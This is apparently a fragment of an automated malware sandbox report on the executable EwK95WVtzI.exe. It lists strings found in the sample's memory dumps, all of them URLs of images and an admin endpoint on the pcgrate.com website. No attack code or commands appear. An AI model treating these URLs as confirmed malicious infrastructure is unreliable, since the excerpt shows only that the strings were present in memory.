                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/100x100-px-1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
